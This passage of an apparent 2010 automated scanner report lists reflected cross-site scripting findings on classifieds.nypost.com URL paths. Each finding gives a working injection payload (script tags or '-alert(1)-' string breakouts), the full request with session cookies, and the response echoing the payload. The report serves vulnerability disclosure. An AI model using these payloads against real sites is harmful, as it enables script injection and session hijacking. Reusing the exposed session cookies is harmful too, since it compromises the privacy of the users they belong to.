<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/housinge1cb0"><script>alert(1)</script>3f30dc1b8ef/rent/" />
...[SNIP]...

1.79. http://www.classifieds.nypost.com/housing/rent/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f549c"-alert(1)-"e2c14dc3ef7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /housing/rentf549c"-alert(1)-"e2c14dc3ef7/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:49 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4OTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds housing/rentf549c"-alert(1)-"e2c14dc3ef7/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.80. http://www.classifieds.nypost.com/housing/rent/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53a78"><script>alert(1)</script>e961e75065f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing/rent53a78"><script>alert(1)</script>e961e75065f/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:48 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4ODt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/housing/rent53a78"><script>alert(1)</script>e961e75065f/" />
...[SNIP]...

1.81. http://www.classifieds.nypost.com/housing/rent/apartment/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/apartment/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0fff"><script>alert(1)</script>12393b8137 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housinga0fff"><script>alert(1)</script>12393b8137/rent/apartment/ HTTP/1.1
Host: www.classifieds.nypost.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=3ba3b7OvjvD-WrLvxgh; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; otu=cbfed66148755e439126da6455913c97; ots=60bf76744e7ba6b01d483d356eed1708; a=dT1GQjIyRkZFQzRDRjAxNUY3; l=r%3D5; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; loc_USA_selected=aTowOw%3D%3D; cmTPSet=Y; CoreID6=51956591237812908058225; __qca=P0-309717630-1290805822624; 90184176_clogin=l=1290805822&v=1&e=1290809422731; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4NDt9

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:21:36 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjg5Njt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/housinga0fff"><script>alert(1)</script>12393b8137/rent/apartment/" />
...[SNIP]...

1.82. http://www.classifieds.nypost.com/housing/rent/apartment/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/apartment/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1bbe"-alert(1)-"441e6b8ef00 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /housingb1bbe"-alert(1)-"441e6b8ef00/rent/apartment/ HTTP/1.1
Host: www.classifieds.nypost.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=3ba3b7OvjvD-WrLvxgh; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; otu=cbfed66148755e439126da6455913c97; ots=60bf76744e7ba6b01d483d356eed1708; a=dT1GQjIyRkZFQzRDRjAxNUY3; l=r%3D5; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; loc_USA_selected=aTowOw%3D%3D; cmTPSet=Y; CoreID6=51956591237812908058225; __qca=P0-309717630-1290805822624; 90184176_clogin=l=1290805822&v=1&e=1290809422731; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4NDt9

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:21:37 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjg5Nzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds housingb1bbe"-alert(1)-"441e6b8ef00/rent/apartment/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.83. http://www.classifieds.nypost.com/housing/rent/apartment/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/apartment/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f319"><script>alert(1)</script>753c6886db6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing/rent8f319"><script>alert(1)</script>753c6886db6/apartment/ HTTP/1.1
Host: www.classifieds.nypost.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=3ba3b7OvjvD-WrLvxgh; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; otu=cbfed66148755e439126da6455913c97; ots=60bf76744e7ba6b01d483d356eed1708; a=dT1GQjIyRkZFQzRDRjAxNUY3; l=r%3D5; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; loc_USA_selected=aTowOw%3D%3D; cmTPSet=Y; CoreID6=51956591237812908058225; __qca=P0-309717630-1290805822624; 90184176_clogin=l=1290805822&v=1&e=1290809422731; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4NDt9

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:21:37 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjg5Nzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/housing/rent8f319"><script>alert(1)</script>753c6886db6/apartment/" />
...[SNIP]...

1.84. http://www.classifieds.nypost.com/housing/rent/apartment/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/apartment/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9c8f"-alert(1)-"52f037de594 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /housing/renta9c8f"-alert(1)-"52f037de594/apartment/ HTTP/1.1
Host: www.classifieds.nypost.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=3ba3b7OvjvD-WrLvxgh; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; otu=cbfed66148755e439126da6455913c97; ots=60bf76744e7ba6b01d483d356eed1708; a=dT1GQjIyRkZFQzRDRjAxNUY3; l=r%3D5; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; loc_USA_selected=aTowOw%3D%3D; cmTPSet=Y; CoreID6=51956591237812908058225; __qca=P0-309717630-1290805822624; 90184176_clogin=l=1290805822&v=1&e=1290809422731; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4NDt9

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:21:38 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjg5ODt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds housing/renta9c8f"-alert(1)-"52f037de594/apartment/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.85. http://www.classifieds.nypost.com/housing/rent/apartment/-/-/usa:ny:newyork/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/apartment/-/-/usa:ny:newyork/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f3cc"-alert(1)-"380ba0e14e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /housing8f3cc"-alert(1)-"380ba0e14e4/rent/apartment/-/-/usa:ny:newyork/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:51 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5MTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds housing8f3cc"-alert(1)-"380ba0e14e4/rent/apartment/-/-/usa:ny:newyork/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.86. http://www.classifieds.nypost.com/housing/rent/apartment/-/-/usa:ny:newyork/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/apartment/-/-/usa:ny:newyork/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60a24"><script>alert(1)</script>2a2f193d597 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing60a24"><script>alert(1)</script>2a2f193d597/rent/apartment/-/-/usa:ny:newyork/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:50 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5MDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/housing60a24"><script>alert(1)</script>2a2f193d597/rent/apartment/-/-/usa:ny:newyork/" />
...[SNIP]...

1.87. http://www.classifieds.nypost.com/housing/rent/apartment/-/-/usa:ny:newyork/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/apartment/-/-/usa:ny:newyork/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ad2b"-alert(1)-"6f787bddca5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /housing/rent7ad2b"-alert(1)-"6f787bddca5/apartment/-/-/usa:ny:newyork/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:53 GMT
